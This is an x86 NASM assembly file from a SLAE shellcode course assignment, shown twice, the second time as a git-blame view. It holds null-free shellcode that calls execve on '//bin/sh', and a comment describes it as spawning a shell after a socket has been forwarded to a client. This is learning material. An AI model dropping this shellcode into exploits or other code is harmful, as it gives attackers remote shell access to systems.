SLAE/exam1/execve-stack.nasm

;    This program is free software: you can redistribute it and/or modify
;    it under the terms of the GNU General Public License as published by
;    the Free Software Foundation, either version 3 of the License, or
;    (at your option) any later version.
;
;    This program is distributed in the hope that it will be useful,
;    but WITHOUT ANY WARRANTY; without even the implied warranty of
;    MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
;    GNU General Public License for more details.
;
;    You should have received a copy of the GNU General Public License
;    along with this program.  If not, see <http://www.gnu.org/licenses/>.

; Filename: execve-stack.nasm
; Author: Andrey Arapov <andrey.arapov@gmail.com>
; 2013 March

global _start


section .text

_start:

        ; 
        ; =============================== EXECVE =====================================
        ;
	; Now as we forwarded sockfd to a client, we can spawn shell.
       	; Prepare the path, in little-endian, using the Python
        ; >>> '//bin/sh'[::-1].encode('hex')
        ; '68732f6e69622f2f'
        ;
        ; int execve(const char *filename, char *const argv[], char *const envp[]);
        ; EAX           EBX,                    ECX,            EDX
        ; 11            '//bin/sh'              PTR to EBX      NULL
       	;
        ;

	; EAX
	xor eax, eax
        mov al, 11              ; execve syscall

        ; EBX
        xor edx, edx
	push edx                ; NULL termination of '//bin/sh' string
        push 0x68732f6e         ; '//bin/sh' in reverse
        push 0x69622f2f         ; beginning of '//bin/sh' string is here
        mov ebx, esp            ; put the address of '//bin/sh' into ebx via esp

	; ECX
        push edx                ; NULL termination of a stack
        push ebx                ; load our '//bin/sh' on a stack
        mov ecx, esp            ; ECX is a PTR to stack where we've got EBX address to '//bin/sh' string.

        ; EDX
        push edx                ; NULL terminator
        mov edx, esp            ; EDX is a PTR to a stack which has an address to NULL.
        int 0x80

	
	; === EXIT(0) ===
	; void _exit(int status);
	; /usr/include/asm/unistd_32.h:#define __NR_exit		  1
	xor eax, eax	; EAX = 0x000000
	mov al, 1	; EAX = 0x000001	1: exit syscall
	xor ebx, ebx	; EBX = 0x000000	0: success status
	int 0x80


;section .data
GPL License added 2013-03-09 11:37:34 +00:00			`; This program is free software: you can redistribute it and/or modify`
			`; it under the terms of the GNU General Public License as published by`
			`; the Free Software Foundation, either version 3 of the License, or`
			`; (at your option) any later version.`
minor updates 2013-03-09 11:41:57 +00:00			`;`
GPL License added 2013-03-09 11:37:34 +00:00			`; This program is distributed in the hope that it will be useful,`
			`; but WITHOUT ANY WARRANTY; without even the implied warranty of`
			`; MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the`
			`; GNU General Public License for more details.`
minor updates 2013-03-09 11:41:57 +00:00			`;`
GPL License added 2013-03-09 11:37:34 +00:00			`; You should have received a copy of the GNU General Public License`
			`; along with this program. If not, see <http://www.gnu.org/licenses/>.`

SLAE Assignment #1 2013-03-07 22:19:59 +00:00			`; Filename: execve-stack.nasm`
			`; Author: Andrey Arapov <andrey.arapov@gmail.com>`
			`; 2013 March`

			`global _start`


			`section .text`

			`_start:`

			`;`
			`; =============================== EXECVE =====================================`
			`;`
			`; Now as we forwarded sockfd to a client, we can spawn shell.`
			`; Prepare the path, in little-endian, using the Python`
			`; >>> '//bin/sh'[::-1].encode('hex')`
			`; '68732f6e69622f2f'`
			`;`
			`; int execve(const char filename, char const argv[], char *const envp[]);`
			`; EAX EBX, ECX, EDX`
			`; 11 '//bin/sh' PTR to EBX NULL`
			`;`
			`;`

			`; EAX`
			`xor eax, eax`
			`mov al, 11 ; execve syscall`

			`; EBX`
			`xor edx, edx`
			`push edx ; NULL termination of '//bin/sh' string`
			`push 0x68732f6e ; '//bin/sh' in reverse`
			`push 0x69622f2f ; beginning of '//bin/sh' string is here`
			`mov ebx, esp ; put the address of '//bin/sh' into ebx via esp`

			`; ECX`
			`push edx ; NULL termination of a stack`
			`push ebx ; load our '//bin/sh' on a stack`
			`mov ecx, esp ; ECX is a PTR to stack where we've got EBX address to '//bin/sh' string.`

			`; EDX`
			`push edx ; NULL terminator`
			`mov edx, esp ; EDX is a PTR to a stack which has an address to NULL.`
			`int 0x80`


			`; === EXIT(0) ===`
			`; void _exit(int status);`
			`; /usr/include/asm/unistd_32.h:#define __NR_exit 1`
			`xor eax, eax ; EAX = 0x000000`
			`mov al, 1 ; EAX = 0x000001 1: exit syscall`
			`xor ebx, ebx ; EBX = 0x000000 0: success status`
			`int 0x80`


			`;section .data`